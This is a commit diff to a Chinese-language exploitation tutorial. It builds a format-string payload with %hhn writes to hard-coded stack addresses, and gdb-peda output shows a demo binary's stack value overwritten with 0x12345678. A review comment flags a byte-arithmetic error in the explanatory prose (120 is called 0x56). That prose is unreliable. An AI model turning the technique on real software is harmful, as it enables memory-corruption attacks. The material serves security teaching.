fix
This commit is contained in:
parent
70fe3201a5
commit
f40c2a69c7
@ -1040,7 +1040,96 @@ gdb-peda$ x/4wb 0xffffd538
|
||||
```
|
||||
把 `AAAA`、`BBBB`、`CCCC`、`DDDD` 占据的地址分别替换成括号中的值,再适当使用填充字节使 8 字节对齐就可以了。构造输入如下:
|
||||
```
|
||||
$ python2 -c 'print("\x38\xd5\xff\xff"+"\x39\xd5\xff\xff"+"\x3a\xd5\xff\xff"+"\x3b\xd5\xff\xff"+"%104c%13$hhn"+"%222c%14$hhn"+"%222c%15$hhn"+"%222c%16$hhn")' > text
|
||||
```
|
||||
其中前四个部分是 4 个写入地址,占 4*4=16 字节,后面四个部分分别用于写入十六进制数,由于使用了 `hh`,所以只会保留一个字节 `0x78`(16+104=120 -> 0x56)、`0x56`(120+222=342 -> 0x0156 -> 56)、`0x34`(342+222=564 -> 0x0234 -> 0x34)、`0x12`(564+222=786 -> 0x312 -> 0x12)。执行结果如下:
|
||||
```
|
||||
$ gdb -q a.out
|
||||
Reading symbols from a.out...(no debugging symbols found)...done.
|
||||
gdb-peda$ b printf
|
||||
Breakpoint 1 at 0x8048350
|
||||
gdb-peda$ r < text
|
||||
Starting program: /home/firmy/Desktop/RE4B/a.out < text
|
||||
[----------------------------------registers-----------------------------------]
|
||||
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||
EBX: 0x804a000 --> 0x8049f14 --> 0x1
|
||||
ECX: 0x1
|
||||
EDX: 0xf7f9883c --> 0x0
|
||||
ESI: 0xf7f96e68 --> 0x1bad90
|
||||
EDI: 0x0
|
||||
EBP: 0xffffd5f8 --> 0x0
|
||||
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
|
||||
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
|
||||
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
|
||||
[-------------------------------------code-------------------------------------]
|
||||
0xf7e27c1b <fprintf+27>: ret
|
||||
0xf7e27c1c: xchg ax,ax
|
||||
0xf7e27c1e: xchg ax,ax
|
||||
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
|
||||
0xf7e27c25 <printf+5>: add eax,0x16f243
|
||||
0xf7e27c2a <printf+10>: sub esp,0xc
|
||||
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
|
||||
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
|
||||
No argument
|
||||
[------------------------------------stack-------------------------------------]
|
||||
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
|
||||
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||
0008| 0xffffd534 --> 0x1
|
||||
0012| 0xffffd538 --> 0x88888888
|
||||
0016| 0xffffd53c --> 0xffffffff
|
||||
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
|
||||
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
|
||||
[------------------------------------------------------------------------------]
|
||||
Legend: code, data, rodata, value
|
||||
|
||||
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
|
||||
gdb-peda$ x/20x $esp
|
||||
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
|
||||
0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
|
||||
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
|
||||
0xffffd55c: 0x00004443 0x00000000 0xffffd538 0xffffd539
|
||||
0xffffd56c: 0xffffd53a 0xffffd53b 0x34303125 0x33312563
|
||||
gdb-peda$ finish
|
||||
Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
|
||||
[----------------------------------registers-----------------------------------]
|
||||
EAX: 0x312
|
||||
EBX: 0x804a000 --> 0x8049f14 --> 0x1
|
||||
ECX: 0x0
|
||||
EDX: 0xf7f98830 --> 0x0
|
||||
ESI: 0xf7f96e68 --> 0x1bad90
|
||||
EDI: 0x0
|
||||
EBP: 0xffffd5f8 --> 0x0
|
||||
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||
EIP: 0x8048520 (<main+138>: add esp,0x20)
|
||||
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
|
||||
[-------------------------------------code-------------------------------------]
|
||||
0x8048514 <main+126>: lea eax,[ebp-0x94]
|
||||
0x804851a <main+132>: push eax
|
||||
0x804851b <main+133>: call 0x8048350 <printf@plt>
|
||||
=> 0x8048520 <main+138>: add esp,0x20
|
||||
0x8048523 <main+141>: sub esp,0xc
|
||||
0x8048526 <main+144>: push 0xa
|
||||
0x8048528 <main+146>: call 0x8048370 <putchar@plt>
|
||||
0x804852d <main+151>: add esp,0x10
|
||||
[------------------------------------stack-------------------------------------]
|
||||
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||
0004| 0xffffd534 --> 0x1
|
||||
0008| 0xffffd538 --> 0x12345678
|
||||
0012| 0xffffd53c --> 0xffffffff
|
||||
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
|
||||
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
|
||||
0028| 0xffffd54c --> 0x80484b0 (<main+26>: add ebx,0x1b50)
|
||||
[------------------------------------------------------------------------------]
|
||||
Legend: code, data, rodata, value
|
||||
0x08048520 in main ()
|
||||
gdb-peda$ x/20x $esp
|
||||
0xffffd530: 0xffffd564 0x00000001 0x12345678 0xffffffff
|
||||
0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0
|
||||
0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
|
||||
0xffffd560: 0x00000000 0xffffd538 0xffffd539 0xffffd53a
|
||||
0xffffd570: 0xffffd53b 0x34303125 0x33312563 0x6e686824
|
||||
```
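Review bot: The byte arithmetic in the explanatory paragraph (the line beginning 「其中前四个部分是 4 个写入地址」) contradicts itself: 16+104=120 is 0x78, not 0x56, and the second item gives a bare `56` where 0x56 is meant, so the list should read `0x78`(16+104=120 -> 0x78)、`0x56`(120+222=342 -> 0x0156 -> 0x56)、`0x34`(342+222=564 -> 0x0234 -> 0x34)、`0x12`(564+222=786 -> 0x0312 -> 0x12). The gdb output itself is consistent with the corrected values (EAX is 0x312 = 786 after `finish`, and 0xffffd538 holds 0x12345678), so only the prose is off. It may also be worth a one-sentence caveat that the `%13$hhn`…`%16$hhn` offsets follow from the four address words sitting at 0xffffd564 onward, i.e. 13 dwords above the first printf argument at 0xffffd530, and that the hard-coded 0xffffd5xx addresses presumably only hold with ASLR disabled (as under gdb here), so the payload would need the stack address re-derived outside the debugger.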
|
||||
|
||||
|
||||
|